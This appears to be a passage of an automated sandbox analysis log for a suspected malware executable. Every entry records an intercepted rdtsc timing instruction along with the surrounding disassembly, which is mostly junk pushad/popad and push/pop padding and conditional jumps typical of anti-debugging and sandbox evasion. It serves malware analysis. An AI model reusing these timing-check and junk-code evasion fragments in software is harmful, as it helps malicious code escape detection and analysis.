Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1050156 second address: 1050160 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D84D62022h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1057CE9 second address: 1057CEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1057CEF second address: 1057CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0D84D6201Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1057CFD second address: 1057D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1057FC9 second address: 1057FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105826C second address: 1058272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1058272 second address: 1058276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1058276 second address: 105828A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0D8517B90Eh 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105828A second address: 10582BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D84D6201Dh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0D84D62024h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10582BB second address: 10582C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10582C1 second address: 10582D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0D84D6201Ah 0x0000000c jnl 00007F0D84D62016h 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10582D8 second address: 10582FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B919h 0x00000007 jc 00007F0D8517B906h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105888E second address: 1058894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1058894 second address: 10588C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F0D8517B926h 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10588C2 second address: 10588CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0D84D62016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10588CE second address: 10588D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1058BE3 second address: 1058BE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1059127 second address: 1059142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D8517B917h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1059142 second address: 1059146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1059146 second address: 105917C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jne 00007F0D8517B906h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 jbe 00007F0D8517B908h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0D8517B914h 0x00000025 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105DD7F second address: 105DD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105DD83 second address: 105DD8D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D8517B906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 105DD8D second address: 105DD97 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D84D6201Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061B4E second address: 1061B5F instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D8517B906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061B5F second address: 1061B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061B65 second address: 1061B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061B69 second address: 1061B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1060DF3 second address: 1060E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F0D8517B917h 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1060FB8 second address: 1060FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0D84D62016h 0x0000000a jmp 00007F0D84D62021h 0x0000000f rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1060FD3 second address: 1060FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061149 second address: 1061152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061152 second address: 1061157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061157 second address: 106115D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 106115D second address: 1061163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061163 second address: 1061167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061167 second address: 106116B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 106116B second address: 10611A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0D84D62022h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D84D62026h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10611A0 second address: 10611A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10611A4 second address: 10611AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D84D62016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061306 second address: 106130E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 106130E second address: 1061314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061314 second address: 1061321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10615DE second address: 10615E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10615E4 second address: 1061600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B916h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061600 second address: 1061606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1061606 second address: 1061625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B911h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0D8517B906h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1068908 second address: 1068920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D84D62022h 0x0000000b rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1068DFC second address: 1068E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1068E02 second address: 1068E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D84D62016h 0x0000000a jc 00007F0D84D62016h 0x00000010 popad 0x00000011 jp 00007F0D84D6202Ah 0x00000017 jmp 00007F0D84D62022h 0x0000001c pushad 0x0000001d popad 0x0000001e jng 00007F0D84D6201Ch 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1069216 second address: 106921C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1069354 second address: 1069361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007F0D84D62016h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1069361 second address: 1069369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 106A4ED second address: 106A4F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 106A4F2 second address: 106A4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 106A4F8 second address: 106A516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0D84D62025h 0x0000000e rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1070C7F second address: 1070C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D8517B912h 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1070C95 second address: 1070C9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1070C9D second address: 1070CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1070F26 second address: 1070F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D84D62029h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F0D84D62016h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1070F4E second address: 1070F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D8CB second address: 107D8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D84D6201Bh 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D8DA second address: 107D8F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D8517B911h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D41F second address: 107D423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D423 second address: 107D429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D429 second address: 107D42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D42F second address: 107D47A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D8517B915h 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F0D8517B906h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 jmp 00007F0D8517B914h 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F0D8517B90Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D5A9 second address: 107D5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 ja 00007F0D84D62016h 0x0000000d jg 00007F0D84D62016h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D5C2 second address: 107D5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0D8517B906h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D8517B90Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 107D5DE second address: 107D5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1082A61 second address: 1082A71 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D8517B906h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 1082A71 second address: 1082A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 108249B second address: 10824A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10824A7 second address: 10824B9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D84D62016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F0D84D6201Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10957AB second address: 10957B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D8517B906h 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10957B5 second address: 10957BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10957BB second address: 1095804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0D8517B90Ch 0x0000000c jbe 00007F0D8517B906h 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0D8517B912h 0x00000020 push esi 0x00000021 jmp 00007F0D8517B914h 0x00000026 jbe 00007F0D8517B906h 0x0000002c pop esi 0x0000002d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 109C9A0 second address: 109C9AA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D84D62016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 109C9AA second address: 109C9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0D8517B906h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 109CB04 second address: 109CB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 109CDEF second address: 109CDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A1AD5 second address: 10A1ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A1ADE second address: 10A1AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D8517B90Ah 0x00000009 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A1AEC second address: 10A1AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A1AF2 second address: 10A1B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0D8517B91Bh 0x0000000c jmp 00007F0D8517B90Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A1B0F second address: 10A1B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A6B76 second address: 10A6B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jnl 00007F0D8517B906h 0x0000000c jmp 00007F0D8517B90Dh 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A6B98 second address: 10A6BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F0D84D62016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007F0D84D62016h 0x00000016 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A6BAE second address: 10A6BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10A6BB2 second address: 10A6BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0D84D62018h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10B36FF second address: 10B3707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10AC5F8 second address: 10AC5FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10C0734 second address: 10C075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 jp 00007F0D8517B906h 0x0000000f pop esi 0x00000010 pushad 0x00000011 jng 00007F0D8517B906h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10C08AC second address: 10C08D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0D84D6201Eh 0x0000000a jmp 00007F0D84D62024h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10C08D8 second address: 10C08DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10CD62F second address: 10CD635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\1000115002\6b11689b40.exe RDTSC instruction interceptor: First address: 10CD635 second address: 10CD655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D8517B917h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
